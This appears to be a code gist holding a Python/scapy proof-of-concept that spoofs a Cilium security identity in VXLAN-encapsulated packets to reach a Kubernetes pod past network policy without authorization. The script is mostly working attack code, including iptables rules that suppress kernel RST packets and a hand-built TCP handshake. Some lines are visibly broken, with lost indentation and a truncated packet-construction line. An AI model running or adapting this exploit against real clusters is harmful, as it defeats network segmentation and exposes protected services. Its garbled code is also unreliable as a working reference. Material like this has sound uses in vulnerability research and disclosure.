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Created December 31, 2020 11:51
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Spoofing Cilium identity value in vxlan tunneled mode
#! /usr/bin/env python
# Aim of this script is to send a vxlan tunneled HTTP request with spoofed
# identity and pass through the authz checks implemented in cilium-ebpf.
# Configuration you need to set correct:
# 1. The target pod address (dip, dport) to which you want to make unauthorized access
# 2. The source identity (identity = 8849 below) to spoof. Use `cilium identity
# list` to check valid identity values.
# 3. The target node's vxlan IP address (vxlan_ip) and port (vxlan_port = 8472
# def used by cilium).
# How to figure out unauth access is done i.e, validating spoofed identity works?
# You will receive successful HTTP response from the spoof application even
# though the policy says deny all except specific identity (this identity I
# spoof through this app).
# You can use `hubble observe` to monitor the policy verdicts
# You can check `tcpdump` to check packet flows.
# Note that you need to drop the RST sent from your kernel. Kernel sends a TCP
# RST for unknown SYN-ACK rcvd from the remote. Kernel does not know of any
# known TCP session to which this SYN-ACK belongs since the scapy uses RAW
# sockets to send the SYN. The add_iptable_rule()/rem_iptable_rule handles this
# drop operation.
from scapy.all import *
from time import sleep
import random
import atexit
import os
iptrule = None
def rem_iptable_rule():
global iptrule
if iptrule != None:
os.system("iptables -D " + iptrule) # Delete the iptable rule
def add_iptable_rule(sport, dport):
global iptrule
if iptrule != None:
print("Iptables rule is already added.")
iptrule = " OUTPUT -p tcp --tcp-flags RST RST --sport " + str(sport) + " --dport " + str(dport) + " -j DROP"
os.system("iptables -A " + iptrule) # Apply the iptable rule
# Add vxlan encapsulation and send the pkt
# use VXLAN_DISABLE=1 env var to disable adding encap hdr
def vxlan_send(pkt):
vxlan_disable = os.getenv('VXLAN_DISABLE')
if vxlan_disable != None and vxlan_disable != "0":
return send(pkt)
vxlan_ip = ""
vxlan_port = 8472
identity = 8849 # Sent in vxlan VNI field as expected by cilium .. use `cilium identity list` to check which identities are allowed and spoof that identity
tpkt = IP(dst=vxlan_ip)/UDP(dport=vxlan_port)/VXLAN(vni=identity)/pkt # Encapsulate the input pkt with vxlan
return send(tpkt)
def send_http_req():
dport = 80 # destination port
sip = ""
dip = "" # Set your pod's IP address here
payload = 'POST /v1/request-landing HTTP/1.1\r\nHost: ' + dip + '\r\n\r\n' # packet payload
seq = random.randint(2,pow(2,24)) # Generate random initial TCP seq num
sport = random.randint(10000,60000) # Generate random source port within upper uint16_t range
add_iptable_rule(sport, dport) # Add iptables rule to drop the RST
syn = IP(src=sip, dst=dip) / TCP(dport=dport, sport=sport, flags='S', seq=seq)
syn_ack = sr1(syn) # Receive TCP SYN-ACK
pcapfilter = "udp and dst port 8472"
pkts = sniff(iface=get_if_list(), filter=pcapfilter, prn=lambda p: p.summary(), count=1)
req = IP(src=syn_ack[IP].dst, dst=syn_ack[IP].src) / \
TCP(dport=dport, sport=syn_ack[IP].dport, seq=syn_ack[TCP].ack, ack=syn_ack[TCP].seq + 1, flags='A') / \
pkts = sniff(filter="tcp and src host " + syn_ack[IP].src, count=3) # wait for TCP packets from the dip
# usually responds with a TCP ACK pkt first and then with a
# HTTP-200 OK. Thus the first packet needs to be dropped.
for rsp in pkts:
if rsp[IP].len > 50: # Any IP pkt with len>50 will be a HTTP response # show the HTTP response
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